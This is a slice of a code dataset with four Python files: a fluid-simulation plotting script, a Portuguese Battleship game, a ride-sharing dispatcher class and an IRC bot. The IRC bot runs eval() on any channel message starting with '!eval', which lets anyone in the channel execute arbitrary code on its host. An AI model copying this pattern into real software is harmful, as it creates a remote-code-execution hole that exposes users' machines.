float(l[1]),float(l[2])])\n else:\n segn = seg[:]\n sur.append(segn)\n seg = []\n return sur\n\n def get_sur_1(time):\n fn = os.path.join(PATH_INTERFACE, 'interface-%g' % time)\n sur = []\n with open(fn, 'r') as file:\n seg = []\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 2:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), float(l[1])])\n else:\n segn = seg[:]\n sur.append(segn)\n seg = []\n return sur\n\n def get_sur_reference(filename):\n fn = os.path.join(PATH_REFERENCE, filename)\n arrs = []\n strr = ''\n with open(fn, 'r') as file:\n for line in file:\n if '1e+30' in line:\n line=line.replace('1e+30','0')\n strr += line\n with open(fn, 'w') as 
file:\n file.write(strr)\n with open(fn, 'r') as file:\n for line in file.readlines():\n line = line.strip().strip('\\n')\n l = line.split(' ')\n #print float(l[0]), float(l[1]),float(l[2]),float(l[3])\n arrs.append([float(l[0])-8, float(l[1]),float(l[2]),float(l[3])])\n return arrs\n\n def get_sur_2(time):\n fn = os.path.join(PATH_VELOCITY, 'vprof-%.1f' % time)\n arrs = []\n strr = ''\n with open(fn, 'r') as file:\n for line in file:\n if '1e+30' in line:\n line=line.replace('1e+30','0')\n strr += line\n with open(fn, 'w') as file:\n file.write(strr)\n with open(fn, 'r') as file:\n for line in file.readlines():\n line = line.strip().strip('\\n')\n l = line.split(' ')\n #print float(l[0]), float(l[1]),float(l[2]),float(l[3])\n arrs.append([float(l[0])-8, float(l[1]),float(l[2]),float(l[3])])\n return arrs\n\n def get_bubble_head(sur):\n maxx = sur[0][0][0]\n for seg in sur:\n x1 = seg[0][0]\n y1 = seg[0][1]\n x2 = seg[1][0]\n y2 = seg[1][1]\n if x1 > maxx:\n maxx = x1\n if x2 > maxx:\n maxx = x2\n return maxx\n\n def get_bubble_tail(sur):\n minn = sur[0][0][0]\n for seg in sur:\n x1 = seg[0][0]\n y1 = seg[0][1]\n x2 = seg[1][0]\n y2 = seg[1][1]\n if x1 < minn:\n minn = x1\n if x2 < minn:\n minn = x2\n return minn\n\n\n def plot_sur(plt, sur, sig, color):\n \n for seg in sur:\n x1 = seg[0][0]\n x2 = seg[1][0]\n y1 = seg[0][1]\n y2 = seg[1][1]\n plt.plot([y1, y2], [x1 - sig, x2 - sig], color,lw = 3)\n res, = plt.plot([-y1, -y2], [x1- sig, x2 - sig], color, lw = 3)\n return res\n '''\n def context2array(sur):\n return np.matrix([map(float, re.split('\\s+', ln.strip()))\n for ln in sur.splitlines() if ln.strip()])'''\n\n\n def plot_contour(x_dim, y_dim, x_steps, y_steps, scalar_field, v_min, v_max, levels=None):\n from matplotlib import cm\n x, y = np.mgrid[-x_dim/2:x_dim/2:x_steps*1j, -y_dim/2:y_dim/2:y_steps*1j]\n cs = plt.contourf(x, y, scalar_field, zorder=1, cmap=plt.cm.jet, extent=[-x_dim/2.0, x_dim/2.0, -y_dim/2.0, y_dim/2.0], vmin=v_min, vmax=v_max, levels=levels)\n plt.colorbar(cs)\n return cs.levels\n\n\n def plot_velocity(plt, sur):\n \n from matplotlib.colors import LogNorm\n\n soa =np.array(sur) \n X,Y,U,V = zip(*soa)\n M = np.hypot(U, V)\n ax = plt.gca()\n YN = np.array([-val for val in Y])\n ax.quiver(Y,X,V,U,M, units = 'xy',angles='xy',scale_units='xy', scale=20,cmap=plt.cm.jet,clim=(0,2.5))\n qq=ax.quiver(YN,X,V,U,M,units = 'xy', angles='xy',scale_units='xy',scale=20,cmap=plt.cm.jet,clim=(0,2.5))\n #cbar = plt.colorbar(qq,shrink=0.9,aspect=25)\n #cbar_ticks = np.linspace(0., 2., num=11, endpoint=True) \n #cbar.set_ticks(cbar_ticks) \n #cbar.ax.set_ylabel('$U^*$')\n\n\n def out_data(filename):\n fn = os.path.join(PATH_OUT , filename)\n seg = []\n with open(fn, 'r') as file:\n for line in file.readlines():\n line = line.rstrip('\\n')\n l = line.split(' ')\n if len(l) == 26:\n #print float(l[0]), float(l[1])\n seg.append([float(l[0]), float(l[5]), float(l[6])])\n else:\n seg = []\n return seg\n \n\n def plot_legend(plt,time, xmin, ymin, xmax, ymax):\n #import case as case\n str_undim = 'log(Mo) = -3.65\\nEo =41.86\\nNf = 134.93\\n$\\\\rho_r=934$\\n$\\mu_r=2906$'\n plt.axes().text(xmin - 2.8, (ymin+0.5), \n str_undim,\n bbox={'facecolor':'white'}, \n fontname='monospace',\n )\n str_time = r'$t^*$ = %.2f' % (time-14.1) \n plt.axes().text(xmin - 2.8, (ymin-0.1), \n str_time,bbox={'facecolor':'white'}, \n fontname='monospace',\n color='r'\n )\n\n def plot_streamline(plt,sur,a,time,ex,y_lim,y_max,head,tail):\n from scipy.interpolate import griddata\n ax = plt.gca()\n soa 
=np.array(sur) \n x,y,u,v = zip(*soa)\n nx, ny =1000, 1000\n yn = np.array([-val for val in y])\n pts = np.vstack((x, y)).T\n ptsi = np.vstack((x, yn)).T\n vals = np.vstack((u, v)).T\n # lower-parts\n xi = np.linspace(-4,8,1000)\n yi = np.linspace(0,ex[i]*0.5+0.08 ,1000)\n yni = np.linspace(-ex[i]*0.5-0.08,0,1000)\n ipts = np.vstack(a.ravel() for a in np.meshgrid(yi, xi)[::-1]).T\n iptsi= np.vstack(a.ravel() for a in np.meshgrid(yni, xi)[::-1]).T\n ivals = griddata(pts, vals, ipts, method='cubic')\n ivalsi = griddata(ptsi, vals, iptsi, method='cubic')\n ui, vi = ivals.T\n ui_i,vi_i = ivalsi.T\n ui.shape = vi.shape = (ny, nx)\n ui_i.shape = vi_i.shape = (ny, nx)\n time_1 = time*100 + 1\n b = int(time_1)\n # upper-parts\n\n c = ex[i]*0.5\n\n ### define the position and range of the streamlines\n stream_points_1 = np.array(zip(np.arange(0.5,0,-0.1), np.arange(head+0.1-8,tail-1-8,-.1))) # x>0 for lower tube\n stream_points_2 = np.array(zip(np.arange(c,0.55,-0.1), np.arange(0,4,.1))) # x>0 for upper tube\n stream_points_3 = np.array(zip(np.arange(-0.5,0,0.1), np.arange(head+0.1-8,tail-1-8,-.1))) # x<0 for lower tube\n stream_points_4 = np.array(zip(np.arange(-c,-0.55,0.1), np.arange(0,4,.1))) # x<0 for upper tube\n\n # vortex near bubble tail\n stream_points_5 = np.array(zip(np.arange(-0.05,0,0.05), np.arange(tail-8.1,tail-8.15,-.05)))\n stream_points_6 = np.array(zip(np.arange(0.05,0,-0.05), np.arange(tail-8.1,tail-8.15,-.05)))\n # vortex inside bubble \n stream_points_7 = np.array(zip(np.arange(0.2,0,-0.1), np.arange(tail-7.5,head-9.5,.1)))\n stream_points_8 = np.array(zip(np.arange(-0.2,0,0.1), np.arange(tail-7.5,head-9.5,.1)))\n\n\n\n #### draw streamlines\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_1, arrowsize = 0.3,linewidth = 0.5,density =20)\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_2, arrowsize = 0.3,linewidth = 0.5,density =20)\n\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_3, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_4, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='forward')\n\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_6, arrowsize = 0.3,linewidth = 0.5,density=20,integration_direction='both')\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_5, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n\n ax.streamplot(yi, xi, vi-a[b][2], ui-a[b][1], color = 'k',start_points=stream_points_7, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n ax.streamplot(yni, xi, a[b][2] - vi_i, ui_i-a[b][1], color = 'k',start_points=stream_points_8, arrowsize = 0.3,linewidth = 0.5,density =20,integration_direction='both')\n \n \n def simulation(a):\n\n time_begin = 8.9\n time_end = 30\n \n\n for time in np.arange(time_begin,time_end,1):\n\n plt.figure(figsize=(4, 4))\n\n \"\"\"\n Set labels\n \"\"\"\n #plt.xlabel(r'$r/D$')\n #plt.ylabel(r'$(z_h - z)/D$')\n #plt.axis('off')\n \"\"\"\n Set range\n \"\"\"\n #plt.xscale('log')\n #plt.yscale('log')\n # plt.ylim([0,0.5])\n\n sur1 = get_sur_1(time)\n sur2 = get_sur_2(time)\n #plot_velocity(plt,sur2)\n a = out_data('out')\n\n ex= [1.72,1.45,1.33,1.24,1.12,1,0.9,0.81,0.69] # expansion ratio\n \n # change interface name to float\n '''filename_list = 
os.listdir(CWP) \n for filename in filename_list: \n strlen = len(reply.encode(filename))\n str_reverse = filename[::-1] \n start = str.find(filename,\"-\") + 1 \n end = str.find(str_reverse,\"(\") \n end = strlen - end - 1\n apxstart = str.find(str_reverse,\".\") \n apxstart = - apxstart - 1 \n final_filename = filename[start:end] + filename[apxstart:]\n print('interface-'+filename[start:end]) \n print('interface=-1-:' + final_filename)'''\n \n \n \n xh1 = get_bubble_head(sur1)\n xh11 = get_bubble_tail(sur1)\n with open('data-{}'.format(i), 'aw') as f: \n f.write(\"%.1f %f %.4f\\n\" %(time, xh1, xh11))\n le1 = plot_sur(plt, sur1, 8, \"r\")\n \n \n ex_ratio = ex[1] \n #plt.title('$t = %.2f s$' %(0.04*(time-time_begin[i]) ))\n if ex_ratio in ex[:5]:\n expansion = ex_ratio + 0.08\n plt.xlim(-0.5*expansion,0.5*expansion)\n else:\n expansion = 1 + 0.08\n plt.xlim(-0.5*expansion,0.5*expansion)\n\n R_0 = 0.5\n R_ex = R_0*ex_ratio\n delta_ratio = (ex_ratio-1)\n delta_length = delta_ratio*R_0\n deg = [10,15,20,30,35,40,45]\n degree = deg[i]\n theta = degree*math.pi/180\n R_out = (delta_length)/(pow(math.sin(theta),2)*2) \n delta_x = delta_length/math.tan(theta)\n #xx = (8+pow(2*0.3*R_0*R_out - pow(delta_length,2),1/2))\n #xx = (8+pow((2*0.3*R_out - pow(delta_length,2)),1/2)) \n #print(delta_x,R_out,xx)\n yy = [-2,-4.5,-3,-3,-2.5,-2.5,-2,-2]\n \n y_min = xh11 - 8.5\n y_max = xh1 - 7.5\n plt.yticks((np.arange(int(y_min), y_max+0.5, step=1)),fontsize = '18')\n plt.xticks(fontsize = '15')\n #plot_streamline(plt,sur2,a,time,ex,y_min,y_max,xh1,xh11)\n\n plt.ylim(y_min,y_max)\n \n if y_min < 0:\n y1 = math.fabs(y_min )/(y_max - y_min)\n y_2 = math.fabs(y_min - delta_x )/(y_max - y_min)\n elif y_min < delta_x and y_min > 0:\n y1 = 0\n y_2 = math.fabs(y_min- delta_x )/(y_max - y_min)\n else:\n y1 = 0\n y_2 = 0\n x1 = math.fabs(0.5*expansion+0.5)/expansion\n x2 = math.fabs(0.5+expansion)/expansion - 0.08\n x3 = 0\n x4 = (0.5*expansion-0.5 )/expansion\n \n plt.axvline(x = 0.5,ymin = 0, ymax = y1, color='b')\n plt.axvline(x = -0.5,ymin = 0, ymax = y1, color='b')\n plt.axvline(x = 0.5*ex_ratio,ymin = y_2, ymax = 1, color='b')\n plt.axvline(x = -0.5*ex_ratio,ymin = y_2, ymax = 1, color='b')\n \n #plot_legend(plt, time, -0.5, y_min, 0.5, y_max)\n plt.axhspan(xmin = x1,xmax = x2,ymin = y_min,ymax = 0,facecolor = 'w',alpha = 1)\n plt.axhspan(xmin = x3,xmax = x4,ymin = y_min,ymax = 0,facecolor = 'w',alpha = 1)\n #plt.gca().add_patch(Arc((x1, y1), 5, 5, theta1=0, theta2=-110, linewidth=2, zorder=0,color=\"k\"))\n \n from matplotlib import patches\n\n # set the points\n \n # calculate the arc\n mxmy = [R_0 + R_out, 0]\n mx1my1 = [-R_out - R_0, 0]\n width = 2*R_out\n height = 2*R_out\n width_1 = 2*R_out\n height_1 = 2*R_out\n start_angle = 180\n end_angle =-2*deg[i]\n start_angle_1 = 2*deg[i]\n end_angle_1 = -2*deg[i]\n # draw\n plt.gca().add_patch(Arc(mxmy, width, height, start_angle, end_angle,color=\"b\",lw = 1.5))\n plt.gca().add_patch(Arc(mx1my1, width_1, height_1, start_angle_1, end_angle_1,color=\"b\",lw=1.5))\n \n\n #plt.legend([le1,le2,le3], [\"$h = 1/64$\",\"$h = 1/128$\",\"$h = 1/256$\"], loc=\"upper right\", bbox_to_anchor=(-0.3,1))\n\n #plt.axhline(xh11-xh1,xmin=0.7,xmax=1.2,color='b')\n #plt.annotate('$z_{head}$',xy=(0,0),xytext=(-0.5,0),weight='bold',color='r',arrowprops=dict(arrowstyle='->',connectionstyle='arc3',color='k'))\n #plt.annotate('$z_{tail}$',xy=(0.35,xh33-xh3),xytext=(-0.2,xh33-xh3-0.05),weight='bold',color='r',arrowprops=dict(arrowstyle='->',connectionstyle='arc3',color='k'))\n\n # 
plt.grid(True)\n version = matplotlib.__version__\n\n plt.axes().set_aspect('equal')\n plt.tight_layout()\n\n name = \"basilisk_\" + \"%g\"% (4*(time- time_begin))\n #fn = os.path.join(PATH_FIG, (name + \".png\"))\n fn = os.path.join(PATH_FIG, (name + \".pdf\"))\n pdf = PdfPages(fn.format(version))\n #plt.savefig(file_path + '.png', dpi=Vc.dpi)\n #fig = plt.figure()\n #fig.savefig(fn, dpi = fig.dpi)\n plt.savefig(fn, format='pdf', bbox_inches='tight')\n plt.close() \n \n # plt.show()\n\n\n def main():\n simulation(a)\n\n\n if __name__ == '__main__':\n print(\"-----start-----\")\n main() \n print(\"-----finished!!!-----\")\n except ValueError:\n pass\n i += 1\n","sub_path":"taylor-bubble/taylor-2D/post/python/concave-parabolic-expansion.py","file_name":"concave-parabolic-expansion.py","file_ext":"py","file_size_in_byte":19538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"130265355","text":"import random\r\ntabuleiro = [\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\r\n]\r\nnavio_humano = '█'\r\nnavio_enemigo = '#'\r\ntiro = 'X'\r\nacertos_humano = 0\r\nacertos_enemigo = 0\r\n\r\ndef mostrar_tabuleiro():\r\n print('Tabuleiro: ')\r\n for linha in range(0, 10):\r\n for coluna in range(0, 10):\r\n if existe_navio_humano(linha, coluna):\r\n print(navio_humano*2, end='') \r\n else:\r\n print(tabuleiro[linha][coluna]*2, end='')\r\n print()\r\n\r\ndef existe_navio_humano(linha, coluna): \r\n if linha==y1h and coluna == x1h or linha==y2h and coluna == x2h or linha==y3h and coluna == x3h:\r\n return True \r\n else:\r\n return False\r\n\r\nx1h = y1h = x2h = y2h = x3h = y3h = 0\r\nx1e = y1e = x2e = y2e = x3e = y3e = 0\r\nfim_jogo = False\r\n\r\ndef gera_coordenada():\r\n return random.randrange(9)\r\n\r\ndef ler_coordenada(coordenada):\r\n return int(input(f'Digite a coordenada {coordenada} (de 0 a 9): '))\r\n\r\ndef validar_beiradas(x1, y1, x2, y2, x3, y3):\r\n if validar_beirada(x1, y1) and validar_beirada(x2, y2) and validar_beirada(x3, y3):\r\n return True\r\n else:\r\n return False\r\n\r\ndef validar_beirada(x, y):\r\n if x>8 or x<0:\r\n return False\r\n if y>8 or y<0:\r\n return False\r\n return True\r\n\r\ndef validar_sequencia(x1, y1, x2, y2, x3, y3):\r\n if x1+1==x2 and x1+2==x3 and y1==y2 and y1==y3:\r\n return True\r\n if y1+1==y2 and y1+2==y3 and x1==x2 and x1==x3:\r\n return True\r\n if x1-1==x2 and x1-2==x3 and y1==y2 and y1==y3:\r\n return True\r\n if y1-1==y2 and y1-2==y3 and x1==x2 and x1==x3:\r\n return True \r\n return False\r\n\r\ndef validar_coordenadas(x1, y1, x2, y2, x3, y3): \r\n if validar_sequencia(x1, y1, x2, y2, x3, y3) and validar_beiradas(x1, y1, x2, y2, x3, y3):\r\n return True\r\n else:\r\n return False\r\n\r\ndef ler_coordenadas():\r\n global x1h, y1h, x2h, y2h, x3h, y3h \r\n x1h = ler_coordenada('primeiro x')\r\n y1h = ler_coordenada('primeiro y')\r\n x2h = ler_coordenada('segundo x')\r\n y2h = ler_coordenada('segundo y')\r\n x3h = ler_coordenada('terceiro x')\r\n y3h = ler_coordenada('terceiro 
y')\r\n\r\ndef informar_coordenadas_jogador_humano():\r\n ler_coordenadas()\r\n while not validar_coordenadas(x1h, y1h, x2h, y2h, x3h, y3h):\r\n print('Coordenadas inválidas! Devem ser contínuas!')\r\n ler_coordenadas()\r\n\r\ndef validar_coordenada_em_cima(x1e, y1e):\r\n if x1e == x1h and y1e == y1h:\r\n return False\r\n if x1e == x2h and y1e == y2h:\r\n return False\r\n if x1e == x3h and y1e == y3h:\r\n return False\r\n return True\r\n\r\ndef gerar_coordenadas_jogador_enemigo():\r\n global x1e, y1e, x2e, y2e, x3e, y3e\r\n x1e = gera_coordenada()\r\n y1e = gera_coordenada() \r\n while not validar_coordenada_em_cima(x1e, y1e):\r\n x1e = gera_coordenada()\r\n y1e = gera_coordenada() \r\n\r\n # Alinhar para cima\r\n\r\n x3e = x2e = x1e\r\n y2e = y1e-1\r\n y3e = y1e-2 \r\n if not validar_coordenada_em_cima(x2e, y2e) or not validar_coordenada_em_cima(x3e, y3e) or not validar_coordenadas(x1e, y1e, x2e, y2e, x3e, y3e):\r\n \r\n # Alinhar para direita\r\n y3e = y2e = y1e\r\n x2e = x1e+1\r\n x3e = x1e+2 \r\n if not validar_coordenada_em_cima(x2e, y2e) or not validar_coordenada_em_cima(x3e, y3e) or not validar_coordenadas(x1e, y1e, x2e, y2e, x3e, y3e):\r\n \r\n # Alinhar para baixo\r\n x3e = x2e = x1e \r\n y2e = y1e+1\r\n y3e = y1e+2\r\n if not validar_coordenada_em_cima(x2e, y2e) or not validar_coordenada_em_cima(x3e, y3e) or not validar_coordenadas(x1e, y1e, x2e, y2e, x3e, y3e):\r\n \r\n # Alinhar para esquerda\r\n y3e = y2e = y1e\r\n x2e = x1e-1\r\n x3e = x1e-2 \r\n\r\ndef verificar_acertou_tiro(xa, ya, xb, yb):\r\n if xa == xb and ya == yb:\r\n return True\r\n else:\r\n return False\r\n\r\ndef vez_humano():\r\n\r\n global acertos_humano\r\n\r\n x = int(input('Digite a coordenada x para atirar:'))\r\n y = int(input('Digite a coordenada y para atirar:'))\r\n\r\n while not validar_beirada(x, y):\r\n\r\n print('Deve ser um valor entre 0 e 9')\r\n x = int(input('Digite a coordenada x para atirar:'))\r\n y = int(input('Digite a coordenada y para atirar:'))\r\n\r\n if verificar_acertou_tiro(x, y, x1e, y1e) or verificar_acertou_tiro(x, y, x2e, y2e) or verificar_acertou_tiro(x, y, x3e, y3e):\r\n print('Acertou o enemigo!')\r\n\r\n tabuleiro[y][x] = navio_enemigo\r\n acertos_humano += 1\r\n\r\n else:\r\n print('Errou o tiro!')\r\n\r\n tabuleiro[y][x] = tiro\r\n\r\n if acertos_humano == 3:\r\n return True\r\n else:\r\n return False\r\n\r\ndef vez_enemigo():\r\n global acertos_enemigo\r\n # Se ele acertou antes, ao invés de sortear a coordenada x, y, você deve atirar na região próxima onde acertou\r\n # if acertos_enemigo > 0:\r\n # ....\r\n x = random.randrange(0, 10)\r\n y = random.randrange(0, 10) \r\n\r\n while not validar_tiro_enemigo(x, y):\r\n\r\n x = random.randrange(0, 10)\r\n y = random.randrange(0, 10) \r\n\r\n if verificar_acertou_tiro(x, y, x1h, y1h) or verificar_acertou_tiro(x, y, x2h, y2h) or verificar_acertou_tiro(x, y, x3h, y3h):\r\n print('O enemigo te acertou!')\r\n\r\n acertos_enemigo += 1\r\n tabuleiro[y][x] = tiro\r\n\r\n if acertos_enemigo == 3:\r\n return True\r\n else:\r\n return False\r\n\r\ndef validar_tiro_enemigo(x, y):\r\n\r\n if (tabuleiro[y][x] == ' ' or tabuleiro[y][x] == navio_humano) and tabuleiro[y][x] != navio_enemigo:\r\n return True\r\n else:\r\n return False\r\n\r\ninformar_coordenadas_jogador_humano()\r\ngerar_coordenadas_jogador_enemigo()\r\nmostrar_tabuleiro()\r\n\r\nwhile not fim_jogo:\r\n #print('Coordenadas Humano:', x1h, y1h, x2h, y3h, x3h, y3h)\r\n #print('Coordenadas Enemigo:', x1e, y1e, x2e, y2e, x3e, y3e)\r\n ganhou_humano = vez_humano()\r\n 
mostrar_tabuleiro() \r\n    ganhou_enemigo = False  # initialise so the final check cannot raise NameError when the human wins\r\n\r\n    if ganhou_humano:\r\n\r\n        print('Humano Ganhou!') \r\n    else:\r\n\r\n        ganhou_enemigo = vez_enemigo()\r\n        mostrar_tabuleiro() \r\n\r\n        if ganhou_enemigo:\r\n\r\n            print('Enemigo Ganhou!')\r\n        \r\n    if ganhou_humano or ganhou_enemigo:\r\n\r\n        fim_jogo = True\r\n","sub_path":"Batalha_Naval.py","file_name":"Batalha_Naval.py","file_ext":"py","file_size_in_byte":6331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"354510769","text":"from driver import Driver\nfrom rider import Rider\nfrom container import Queue\nfrom location import Location\n\n\nclass Dispatcher:\n    \"\"\"A dispatcher fulfills requests from riders and drivers for a\n    ride-sharing service.\n\n    When a rider requests a driver, the dispatcher assigns a driver to the\n    rider. If no driver is available, the rider is placed on a waiting\n    list for the next available driver. A rider that has not yet been\n    picked up by a driver may cancel their request.\n\n    When a driver requests a rider, the dispatcher assigns a rider from\n    the waiting list to the driver. If there is no rider on the waiting list,\n    the dispatcher does nothing. Once a driver requests a rider, the driver\n    is registered with the dispatcher, and will be used to fulfill future\n    rider requests.\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Initialize a Dispatcher.\n\n        @type self: Dispatcher\n        @rtype: None\n        \"\"\"\n        self._driving_fleet = Queue()\n        self._waiting_riders = Queue()\n\n    def __str__(self):\n        \"\"\"Return a string representation.\n\n        @type self: Dispatcher\n        @rtype: str\n\n        >>> d = Dispatcher()\n        >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n        >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n        >>> d.request_driver(rider1)\n        >>> d.request_driver(rider2)\n        >>> driver1 = Driver('Stephen', Location(1,2), 3)\n        >>> print(d.request_rider(driver1))\n        Riley\n        >>> print(d)\n        Available Drivers: ['Stephen'] | Waiting Riders: ['Ryan']\n        \"\"\"\n        return 'Available Drivers: {} | Waiting Riders: {}'.format(\n            self._driving_fleet, self._waiting_riders)\n\n    def request_driver(self, rider):\n        \"\"\"Return a driver for the rider, or None if no driver is available.\n\n        Add the rider to the waiting list if there is no available driver.\n\n        @type self: Dispatcher\n        @type rider: Rider\n        @rtype: Driver | None\n\n        >>> d = Dispatcher()\n        >>> driver1 = Driver('Stephen', Location(1,2), 3)\n        >>> driver2 = Driver('Ayesha', Location(2,4), 3)\n        >>> d.request_rider(driver1)\n        >>> d.request_rider(driver2)\n        >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n        >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n        >>> print(d.request_driver(rider1))\n        Stephen\n        >>> print(d.request_driver(rider2))\n        Ayesha\n        \"\"\"\n        if self._driving_fleet.is_empty():\n            self._waiting_riders.add(rider)\n            return None\n        else:\n            driver = None\n\n            for i in self._driving_fleet._items:\n                if driver is None and i.is_idle:\n                    driver = i\n                elif driver is not None:\n                    if ((i.get_travel_time(rider.origin) <\n                            driver.get_travel_time(rider.origin)\n                            and i.is_idle)):\n                        driver = i\n\n            if driver is None:\n                # no idle driver was found: keep the rider on the waiting\n                # list, as the docstring promises\n                self._waiting_riders.add(rider)\n\n            return driver\n\n    def request_rider(self, driver):\n        \"\"\"Return a rider for the driver, or None if no rider is available.\n\n        If this is a new driver, register the driver for future rider requests.\n\n        @type self: Dispatcher\n        @type driver: Driver\n        @rtype: Rider | None\n\n        >>> d = Dispatcher()\n        >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n        >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n        >>> 
d.request_driver(rider1)\n        >>> d.request_driver(rider2)\n        >>> driver1 = Driver('Stephen', Location(1,2), 3)\n        >>> driver2 = Driver('Ayesha', Location(2,4), 3)\n        >>> print(d.request_rider(driver2))\n        Riley\n        >>> print(d.request_rider(driver1))\n        Ryan\n        \"\"\"\n        if driver not in self._driving_fleet:\n            self._driving_fleet.add(driver)\n\n        if self._waiting_riders.is_empty():\n            return None\n        else:\n            return self._waiting_riders.remove()\n\n    def cancel_ride(self, rider):\n        \"\"\"Cancel the ride for rider.\n\n        @type self: Dispatcher\n        @type rider: Rider\n        @rtype: None\n\n        >>> d = Dispatcher()\n        >>> rider1 = Rider('Riley', Location(1,3), Location(1,5), 3)\n        >>> rider2 = Rider('Ryan', Location(2,5), Location(1,5), 3)\n        >>> d.request_driver(rider1)\n        >>> d.request_driver(rider2)\n        >>> d.cancel_ride(rider1)\n        >>> print(d._waiting_riders)\n        ['Ryan']\n        \"\"\"\n        # iterate over a copy: deleting from the list while iterating over\n        # it would skip the element that follows each deletion\n        for i in list(self._waiting_riders._items):\n            if i == rider:\n                self._waiting_riders._items.remove(i)\n","sub_path":"dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"147145360","text":"#ircbot.py\n#Built off of ECHO, an IRC bot written by Robert Szutak\n#https://gist.github.com/RobertSzkutak/1326452\n\n#Features:\n#Python eval system\n#Logging the chat?\n#\tLogs on a per-day basis\n#\tLogged with timestamps\n#\tLogs everything; connections, msgs, /me's, disconnects\n#\tEvery time someone disconnects or connects, read out the names list\n\n\nimport socket\n\nhost = \"irc.freenode.net\"\nport = 6667\n\nIDENT = \"foobar\"\nnick = \"Kirbot\"\nrealname = \"Jordan\"\nmaster = \"ultimamax\"\n\nreadbuffer = \"\"\nircsock = socket.socket( )\nircsock.connect((host, port))\n\nircsock.send(bytes(\"NICK %s\\r\\n\" % nick, \"UTF-8\"))\nircsock.send(bytes(\"USER %s %s bla :%s\\r\\n\" % (IDENT, host, realname), \"UTF-8\"))\nircsock.send(bytes(\"JOIN #_LaG\\r\\n\", \"UTF-8\"));\n\ndef privmsg(target, msg):\n\tprint(\"[SENT]: \" + msg)\n\tircsock.send(bytes(\"PRIVMSG %s %s \\r\\n\" % (target, msg), \"UTF-8\"))\n\ndef command(message):\n\targs = message.split(\" \")\n\tcmd = \"\"\n\ttry:\n\t\tcmd = args[0]\n\t\tcmd = cmd.lstrip(\"!\")\n\texcept Exception:\n\t\tpass\n\tif cmd == \"eval\":\n\t\tinstr = message[len(\"!\" + cmd):].strip() #input string to eval; slice instead of lstrip(), which strips a character set rather than a prefix\n\t\tresult = eval(instr)\n\t\tprivmsg(\"#_LaG\", \"$ \" + instr)\n\t\tprivmsg(\"#_LaG\", \"* \" + str(result))\n\n\nwhile 1:\n\treadbuffer += ircsock.recv(1024).decode(\"utf-8\")\n\ttemp = readbuffer.split(\"\\n\")\n\tprint(readbuffer)\n\treadbuffer = temp.pop()\n\tfor line in temp:\n\t\tline = line.rstrip()\n\t\tline = line.split()\n\n\t\tif len(line) > 0 and line[0] == \"PING\":\n\t\t\tircsock.send(bytes(\"PONG %s\\r\\n\" % line[1], \"UTF-8\"))\n\t\tif len(line) > 1 and line[1] == \"PRIVMSG\":\n\t\t\tsender = \"\"\n\t\t\tfor char in line[0]: #works out who sender is from line[0]\n\t\t\t\tif char == \"!\":\n\t\t\t\t\tbreak\n\t\t\t\tif char != \":\":\n\t\t\t\t\tsender += char\n\t\t\tsize = len(line)\n\t\t\ti = 3\n\t\t\tmessage = \"\"\n\t\t\twhile i < size: #line[3] and beyond is the message\n\t\t\t\tmessage += line[i] + \" \"\n\t\t\t\ti += 1\n\t\t\tmessage = message.lstrip(\":\")\n\t\t\tif line[2] == \"#_LaG\":\n\t\t\t\tif message.startswith(\"!\"):\n\t\t\t\t\tcommand(message)\n\t\t\telse:\n\t\t\t\tircsock.send(bytes(\"PRIVMSG %s %s \\r\\n\" % (sender, message), 
